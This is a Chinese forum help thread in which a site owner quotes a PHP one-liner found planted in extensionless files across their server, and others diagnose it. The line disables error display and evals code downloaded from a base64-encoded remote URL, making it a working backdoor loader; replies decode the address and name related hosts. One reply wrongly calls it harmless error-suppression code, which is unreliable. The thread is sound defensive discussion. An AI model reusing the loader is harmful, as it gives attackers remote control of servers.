【求助】无意间发现服务器网站里有很多这样的文件

不羁zz · 发表于 2024-4-22 21:50

各种名为“web”,"image","log",“cache”并且没有后缀的文件，每个文件夹下都有。内容为：

[PHP] 纯文本查看 复制代码

<?php ini_set("display_errors", "off");eval('?>'.file_get_contents(base64_decode('aHR0cDovLzgubGFpdGUwMDIuY2MvanNjL3hnanNjLnR4dA==')));?>

且都一致。请教大神，这段代码有什么作用？能做什么？有什么危害？该如何防止再次发生？

javasu · 发表于 2024-4-23 11:05

明显是被人挂马啦，后边就是执行base64解码地址的内容

LeonardFrye · 发表于 2024-4-30 14:15

网站被人搞后门了，通过这个函数连接base64后面加密的数据，把服务停一停，找找有没有马，以后挂个日志啥的方便检测

chenxk · 发表于 2024-4-23 10:47

这段代码是用于关闭 PHP 错误报告的。通过设置 ini_set("display_errors", "off");，PHP 将不会显示错误信息。这通常在生产环境中使用，以避免向用户展示敏感的错误信息。

最初的未来 · 发表于 2024-4-24 09:46

使用ini_set函数关闭了错误显示（display_errors设置为"off"），这意味着任何错误都不会显示给终端用户。

使用eval函数执行了一段由base64_decode解码后的字符串内容。

l-l ttp://8.laite002.cc/jsc/xgjsc.txt
xgjsc.txt 内容是一个 PHP 的文件

ttp://mulu.laite002.cc:81
ttp://jschl.nn02.cc

综合判断，你的网站被黑了，，，文件上传漏洞和命令执行漏洞。
解决：买个 WAF 设备，更新代码，更新网站的底层应用

jindunanquan · 发表于 2024-5-16 19:17

这段代码看起来是 PHP 中的一段远程代码执行（Remote Code Execution， RCE）攻击代码。它试图通过执行远程的恶意代码来获取对受感染服务器的控制权。

ini_set("display_errors", "off");：这一行代码试图关闭 PHP 的错误显示。这样做可能是为了隐藏执行中的任何错误消息，以防止被发现。

eval('?>'.file_get_contents(base64_decode('aHR0cDovLzgubGFpdGUwMDIuY2MvanNjL3hnanNjLnR4dA==')));: 这是关键的恶意代码。它使用函数从远程服务器下载一个文件，并将其内容传递给函数执行。这个文件的 URL 被使用了 Base64 编码，因此需要先解码才能知道其真实地址。file_get_contentseval

让我们解码 Base64 编码的部分来获取文件的实际 URL：

php
echo base64_decode('aHR0cDovLzgubGFpdGUwMDIuY2MvanNjL3hnanNjLnR4dA==');
解码后得到的 URL 是，它指向了一个远程的文本文件。http://8.laite002.cc/xgjsc.txt

如果你是在处理这段代码的环境下工作，强烈建议立即停止执行该代码，并对服务器进行全面的安全审查和修复。

flyjerry · 发表于 2024-5-19 16:56

这是木马么？学艺不精继续向高手学习

小哲网络 · 发表于 2024-5-29 15:11

用D盾试下呢！

帐号		自动登录	找回密码
密码			注册[Register]

【求助】无意间发现服务器网站里有很多这样的文件

个人中心